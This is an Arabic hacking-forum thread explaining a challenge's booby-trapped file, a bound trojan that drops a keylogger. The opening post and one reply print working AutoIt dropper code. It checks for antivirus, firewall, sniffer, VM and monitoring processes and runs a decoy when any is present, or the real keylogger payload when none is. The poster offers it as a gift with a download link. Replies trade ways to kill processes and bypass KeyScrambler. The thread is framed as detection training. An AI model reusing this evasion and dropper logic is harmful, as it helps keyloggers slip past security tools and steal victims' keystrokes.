.::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫::. ‏

تم تحميل الصفحة في 0,4381910 ثانية
.::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫::. ‏
الحالة
مغلق و غير مفتوح للمزيد من الردود.
إنضم
18 أغسطس 2010
المشاركات
1,911
الإعجابات
530
النقاط
0





السلام عليكم ورحمة الله وبركاته


اليوم راح اشرح لكم انشاء الله طريقة كشف التلغية الثاني والثالثة


من التحديات


طبعا كلنا يعرف ماحصل في التلغيمة الثانية والثالثة


من اخطاء وذلك بسبب عملهن على هوست وهمي


لأن كنت معد التلغيمة على هوستات حقيقية لكن جائت اوامر من فوق :31:


بتغير ذلك فأتمنى تلتمسون لنا العذر الشديد اعتذر لكل واحد واحب على راسه :15:

بطبع كل عمل فيه اخطاء لكن اتمنى تنظرون الى الجانب المشرق

وتتركون الجانب المظلم

فقد استمتعنا بالمواضيع ولمسنا من بعض الاعضاء الحماس والخبرة ومواهب كبيرة

لم اكن اتوقع انها موجود :2:

وليس الهدف هل كشفت التلغيمات اما لا الهدف ماتعلمنا بالمواضيع

مهمة لكل مبتدأ بكشف التلغيم وحتى للخبراء بتطوير انفسهم اكثر

وعدم الاعتماد على الطرق التلقليدية :6:

وبصراحه اكثر استفد انا منكم وتعلمت اكثر :30:





التلغيمة الثالثة

[ حاولت جعل الشرح فيدية لكن لم استطع بسبب اداة الفلود :31: ]

طبعا التلغيمة الثالثة حاولت اجعلها اصعب مرحلة فهي كتالي

هي تعتمد على جزئين اول جزء من لغة autoit

وهو كتالي



$Kaspersky= ProcessExists("avp.exe")
$FortKnoxGUI= ProcessExists("FortKnoxGUI.exe")
$smsniff= ProcessExists("smsniff.exe")
$vmware= ProcessExists("vmware-authd.exe")
$ashmp= ProcessExists("FireWall.exe")
$Sygate= ProcessExists("smc.exe")
$ZoneAlarm= ProcessExists("VSMON.EXE ")
$Wireshark= ProcessExists("Wireshark.EXE ")
$TiGeRFirewall= ProcessExists("TiGeR-Firewall.exe")
$AntiLogger= ProcessExists("AntiLogger.exe")
$taskmgr= ProcessExists("taskmgr.exe")
$ProcessHacker= ProcessExists("ProcessHacker.exe")
$AVira= ProcessExists("avgnt.exe")
$procexp= ProcessExists("procexp.exe")
$regshot= ProcessExists("regshot.exe")
If $Kaspersky + $procexp + $regshot + $FortKnoxGUI + $AVira + $AntiLogger + $smsniff + $vmware + $ashmp + $Sygate + $ZoneAlarm + $Wireshark +
$TiGeRFirewall = "" Then

FileInstall("ocx23.exe","d:\ocx23.exe",1)

run("d:\ocx23.exe")

Else

FileInstall("ocx33.exe","d:\ocx33.exe",1)
run("d:\ocx33.exe")


EndIf

في اول جزء من السورس تم التعريف بالبرامج واسمائها في البروسيس

بعدها يبدأ الشرط if

اي اذا كانت هذه البرامج موجود في البروسيس

استخرج ملف ocx23 الى d

وقم بتشغيله

طبعا ملف ocx23 وهمي :15:


بعدها تأتي Else

اي اذا لم تكن البرامج في البروسيس

استخرج ocx33 وقم بتشغيله

وهو الحقيقي :10:


-------------------------------------------------------


الان فهمنا الجزء المهم من التلغيمة

نبدأ الان بشرح كشفها وهو سهل جدا ولا يحتاج لتعب :10:

طبعا كشف التلغيمة كاملة لايمكن الاعتماد على برنامج معين

لأنه بمجرد ماتعتمد على برنامج بس اضع اسمه في البروسيس

بكود الايتو ايت ويتم تخطيه لذلك اذا لن اشرح كشف التلغيمة كاملة بل

راح نختصر الى نزول الملفات بـ d

طيب يجي واحد يقول كيف اعرف انه وهمي او لا ؟؟؟

اقولك ياحبيبي لما تشوف ملف حجمه 1.7 يخرج منه ملف حجمه 500

بتأكيد بتعرف انه لازال فيه ملفات بالداخل وهي تعتمد على من يقوم بالفحص

وعلى خبرته

طيب بعد مانزلت الملفات بـ D

نفتح الملف 33

نلاحظ انه يعمل فلود يقوم بأغلاق كل البرامج التي تعمل

بعدها يعمل الكيلوجر بثواني ويغلق نفسه

طيب وش الحل ؟؟؟؟؟

الحل طال عمرك انك تسمي جدار الحماية الخاص بك بأسم msnmsgr.exe

وبل فعل جربوها الاخوان بالموضوع ونجحت

يعني لازم تغيره من مساره الاصلي ويكون عن التشغيل اسمه في البروسيس

مثلا جدار الحماية FortKnox Personal Firewall







وراح تعمل التغيمة ولم يتم عمل فلود لبرنامج FortKnox Personal Firewall

وتكشف البيانات بسهول ويتم استخراج باقي البيانات ان وجد :10:






في الاختام اخواني احب اقول ان الكود هذا مطور من كود اخوي

جوهان فكوده يعمل على برنامج واحد وهو البروسيس

اما انا طورته ليشمل 16 برنامج ويمكن الزيادة :6:

وهو هدية مني لكم اتمنى تقبلون اعتذاري :3:

لتحميل الكود من هــنـــــأ


وبأذن الله راح يتم شرح التلغيمة الاولى كاملة لمحبي التلغيم :19:

اكرر اعتذاري وانشاء الله نشوفكم بأحداث وماضيع قادمة :15:


فـــي امـــًًًًًـــــأأأأن الله :9:





 
إنضم
15 مارس 2011
المشاركات
263
الإعجابات
45
النقاط
0
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

احسنت بارك الله فيك
:6:
 
إنضم
16 أبريل 2009
المشاركات
1,574
الإعجابات
157
النقاط
0
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

يعطيك العافية ياملك
 
إنضم
31 يناير 2010
المشاركات
224
الإعجابات
7
النقاط
0
العمر
26
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

محجووز
بارك الله اخي على ماقدمته للمنتدى
جاري التطبيق
في انتظار كل جديد منك
 
إنضم
20 مارس 2009
المشاركات
1,050
الإعجابات
180
النقاط
0
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:




التلغيمة الثالثة

[ حاولت جعل الشرح فيدية لكن لم استطع بسبب اداة الفلود :31: ]

طبعا التلغيمة الثالثة حاولت اجعلها اصعب مرحلة فهي كتالي

هي تعتمد على جزئين اول جزء من لغة autoit

وهو كتالي




$kaspersky= processexists("avp.exe")
$fortknoxgui= processexists("fortknoxgui.exe")
$smsniff= processexists("smsniff.exe")
$vmware= processexists("vmware-authd.exe")
$ashmp= processexists("firewall.exe")
$sygate= processexists("smc.exe")
$zonealarm= processexists("vsmon.exe ")
$wireshark= processexists("wireshark.exe ")
$tigerfirewall= processexists("tiger-firewall.exe")
$antilogger= processexists("antilogger.exe")
$taskmgr= processexists("taskmgr.exe")
$processhacker= processexists("processhacker.exe")
$avira= processexists("avgnt.exe")
$procexp= processexists("procexp.exe")
$regshot= processexists("regshot.exe")








if $kaspersky + $procexp + $regshot + $fortknoxgui + $avira + $antilogger + $smsniff + $vmware + $ashmp + $sygate + $zonealarm + $wireshark +
$tigerfirewall = "" then

fileinstall("ocx23.exe","d:\ocx23.exe",1)

run("d:\ocx23.exe")

else

fileinstall("ocx33.exe","d:\ocx33.exe",1)
run("d:\ocx33.exe")


endif








اكوادي :( بارك الله فيك

وعد الحر دين عليه
 
إنضم
18 أغسطس 2010
المشاركات
1,911
الإعجابات
530
النقاط
0
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

هلا وغلا بحبايبي :6:

منورين الله يعطيك العافية يارب :15:

:9:
 
إنضم
18 أغسطس 2010
المشاركات
1,911
الإعجابات
530
النقاط
0
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

اكوادي :( بارك الله فيك

وعد الحر دين عليه

[/QUOTE]



في الاختام اخواني احب اقول ان الكود هذا مطور من كود اخوي

جوهان فكوده يعمل على برنامج واحد وهو البروسيس

اما انا طورته ليشمل 16 برنامج ويمكن الزيادة :6:

وهو هدية مني لكم اتمنى تقبلون اعتذاري :3:

لتحميل الكود من هــنـــــأ


وبأذن الله راح يتم شرح التلغيمة الاولى كاملة لمحبي التلغيم :19:

اكرر اعتذاري وانشاء الله نشوفكم بأحداث وماضيع قادمة :15:


فـــي امـــًًًًًـــــأأأأن الله :9:





[/QUOTE]


شوف اخر الموضوع ذكرت انها اكوادك لكني قمت بتطويرها فيحق لي طرحها يالغالي

منور :6:
 
إنضم
9 مارس 2011
المشاركات
345
الإعجابات
90
النقاط
28
الإقامة
مصر
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

شكراً علي الموضوع الرائع :)

تم التقييم يا بطل :16:
 
إنضم
23 يناير 2010
المشاركات
854
الإعجابات
137
النقاط
43
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

وآآآآآآآآآآآآآآو

اخيراً نزل الكشف
 
إنضم
20 يناير 2008
المشاركات
4,983
الإعجابات
912
النقاط
113
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

بارك الله فيك اخوي السويسري

الشرح واضح و احذر من يستخدمة في الديف :10:

يثبت الموضوع لفترة للفائدة
 

DESTRUCTOR

ExpErt DeveloPer
rankrankrankrankrank
إنضم
26 ديسمبر 2009
المشاركات
2,810
الإعجابات
627
النقاط
113
الإقامة
Morocco
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

ومع دلكك لسسآإتني زعلآإن :15: ،
 
إنضم
18 أغسطس 2010
المشاركات
1,911
الإعجابات
530
النقاط
0
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

بارك الله فيك اخوي السويسري

الشرح واضح و احذر من يستخدمة في الديف :10:

يثبت الموضوع لفترة للفائدة
شكرا لك ياقلبي على التثبيت :6:
 
إنضم
20 مارس 2009
المشاركات
1,050
الإعجابات
180
النقاط
0
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:




في الاختام اخواني احب اقول ان الكود هذا مطور من كود اخوي

جوهان فكوده يعمل على برنامج واحد وهو البروسيس

اما انا طورته ليشمل 16 برنامج ويمكن الزيادة :6:

وهو هدية مني لكم اتمنى تقبلون اعتذاري :3:

لتحميل الكود من هــنـــــأ


وبأذن الله راح يتم شرح التلغيمة الاولى كاملة لمحبي التلغيم :19:

اكرر اعتذاري وانشاء الله نشوفكم بأحداث وماضيع قادمة :15:


فـــي امـــًًًًًـــــأأأأن الله :9:





[/QUOTE]


شوف اخر الموضوع ذكرت انها اكوادك لكني قمت بتطويرها فيحق لي طرحها يالغالي

منور :6:[/QUOTE]


ما عليك , طورتها من قبل وطورت اكثر منها

حتى والبرنامج مشتغل : ) :29: ما تخاف لما كتب احترفت الاوتوايت فهو احترفها كع كع كع :24::24:

لكن اكوادي :34::34: < < يا اخي يعشق اكواده


تحيا العقليــــــــــــــDzــــــــة والاكواد الجزائرية
 
إنضم
18 أغسطس 2010
المشاركات
1,911
الإعجابات
530
النقاط
0

az0o0

Active DeveloPer
rankrank
إنضم
18 أغسطس 2010
المشاركات
422
الإعجابات
64
النقاط
0
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

هلا اخوي السويسري مهما تكلمت وتفلسفت فلا يمكن ان اصبح مثلك اخي لانك انسان تفكر بالعقل ماتفكر بالهياط
وهذا الي احبه فيك اخوي السويسري وانت قدوه لاكن عضو موجود في الديف بوينت لاكن حبيت اقولك اني قدرت اتجاوز طريقتك في ازاله برنامج مشفر البيانات الي هو
KeyScrambler
:10:
انت تطور ونحنا نتحداك :15:
 
إنضم
10 مارس 2011
المشاركات
2,608
الإعجابات
1,483
النقاط
113
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

بأٍرك الله فيك ياغألي ,,
شرحـــ رائع ^^
:32::32:
 
إنضم
28 أغسطس 2010
المشاركات
170
الإعجابات
64
النقاط
0
رد

جزاك الله خير اخي العزيز

لكن امر مؤسف وبعد اذنك ان طريقة فاشل للكشف

كل اعتمادك على تغيير اسم اداة كشف إلى عملية ماسنجر للتخطي

طيب مافكرت أضيف عملية ماسنجر لكون AutoIt او اني اضيف كود قتل

عبر فيجوال 6 لأن ماسنجر غير محمي من طرف النظام

اخي احبك بس حبيت اتناقش لو ماعندك مانع

تحياتي تقديري واحترامي :15:
 
إنضم
23 أغسطس 2008
المشاركات
2,491
الإعجابات
681
النقاط
113
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

:30:


فكره حلوه بصراحه

بس كنت متوهق مع نسخة ال x86

:9:
 
إنضم
23 أغسطس 2008
المشاركات
2,491
الإعجابات
681
النقاط
113
رد: رد

جزاك الله خير اخي العزيز

لكن امر مؤسف وبعد اذنك ان طريقة فاشل للكشف

كل اعتمادك على تغيير اسم اداة كشف إلى عملية ماسنجر للتخطي

طيب مافكرت أضيف عملية ماسنجر لكون AutoIt او اني اضيف كود قتل

عبر فيجوال 6 لأن ماسنجر غير محمي من طرف النظام

اخي احبك بس حبيت اتناقش لو ماعندك مانع

تحياتي تقديري واحترامي :15:

هو قال المسنجر فقط للتوضويح بامكانك وضع اي اسم لملف ال exe الخاص بالحمايه مؤقتا في حال رغبتك في كشف التلغيمه

:9:
 
إنضم
18 أغسطس 2010
المشاركات
1,911
الإعجابات
530
النقاط
0
رد: .::∫ تحدي الكبار ~ [ تلغيـمات اسطورية ] ~ الشرح الوافي والكافي لكشف التلغيمة الثاني والثالثة ∫:

هلا اخوي السويسري مهما تكلمت وتفلسفت فلا يمكن ان اصبح مثلك اخي لانك انسان تفكر بالعقل ماتفكر بالهياط
وهذا الي احبه فيك اخوي السويسري وانت قدوه لاكن عضو موجود في الديف بوينت لاكن حبيت اقولك اني قدرت اتجاوز طريقتك في ازاله برنامج مشفر البيانات الي هو
keyscrambler
:10:
انت تطور ونحنا نتحداك :15:
تسلم ياقلبي على الكلام الجميل وبصراحه انت مشاء الله عليك من الاكتشافات التي صارت بالتحديات :15:

لديك الموهبة والخبرة لتكون خبير فحص :6:

الله يوفقك يارب
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل